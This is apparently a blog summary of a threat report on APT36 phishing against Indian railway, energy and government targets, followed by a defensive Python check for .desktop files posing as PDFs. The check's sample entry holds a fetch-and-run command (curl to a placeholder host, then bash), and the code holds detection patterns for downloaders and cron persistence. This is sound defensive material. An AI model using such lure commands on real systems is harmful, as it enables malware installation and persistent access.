APT36 Expands Beyond Military: New Attacks Hit Indian Railways, Oil & Government Systems

Key Takeaways

  • APT36 has expanded its focus to include Indian railway systems, oil and gas infrastructure, and the Ministry of External Affairs.
  • They use .desktop files disguised as PDF documents to execute scripts that download malware and establish persistence using cron jobs.
  • Two attack variants were identified: one uses a single command and control server, while the other includes redundant servers for resiliency.
  • The Poseidon backdoor, built on the Mythic framework and written in Go, is used to maintain access and support lateral movement.
  • Hunt.io researchers discovered more than 100 phishing domains, many of which impersonated Indian government organizations and were hosted by AlexHost.
  • The first phishing domains in this campaign were registered in early July 2025, with live infrastructure observed as of mid-July. This suggests ongoing and active targeting.
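A defender-side check for the lure described in the second takeaway, added here as an example and not taken from the Hunt.io report: it parses a .desktop entry and flags a document-style name or icon paired with an Exec line that launches an interpreter, a downloader, or a persistence location. The sample entry, its file name and its host are constructed placeholders, not indicators from the campaign.

```python
import configparser
import re
import shlex

# Constructed sample modelled on the lure described above (placeholder host, not a real IoC).
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL http://example.invalid/a.sh -o /tmp/.a; bash /tmp/.a"
"""

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def analyze_desktop(text: str) -> list[str]:
    """Return the reasons a .desktop entry looks like a document-lure launcher."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return []
    entry = cp["Desktop Entry"]
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")
    exec_line = entry.get("Exec", "")
    reasons = []
    if name.lower().endswith(DOC_EXTENSIONS):
        reasons.append(f"Name masquerades as a document: {name!r}")
    if "pdf" in icon.lower() or "document" in icon.lower():
        reasons.append(f"Icon mimics a document viewer: {icon!r}")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    # Compare only the basename so /bin/bash and bash are treated alike.
    if argv and argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
        reasons.append(f"Exec launches an interpreter: {argv[0]!r}")
    if re.search(r"\b(curl|wget)\b", exec_line):
        reasons.append("Exec contains a download command")
    if re.search(r"\b(crontab|/etc/cron|\.bashrc|\.profile)", exec_line):
        reasons.append("Exec touches a persistence location")
    return reasons


def is_document_lure(text: str) -> bool:
    """Flag only when a document disguise is combined with executable behaviour."""
    reasons = analyze_desktop(text)
    return any(r.startswith("Name") for r in reasons) and any(r.startswith("Exec") for r in reasons)
```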

To read the complete article, see: Link to Full Article

This post is licensed under CC BY 4.0 by the author.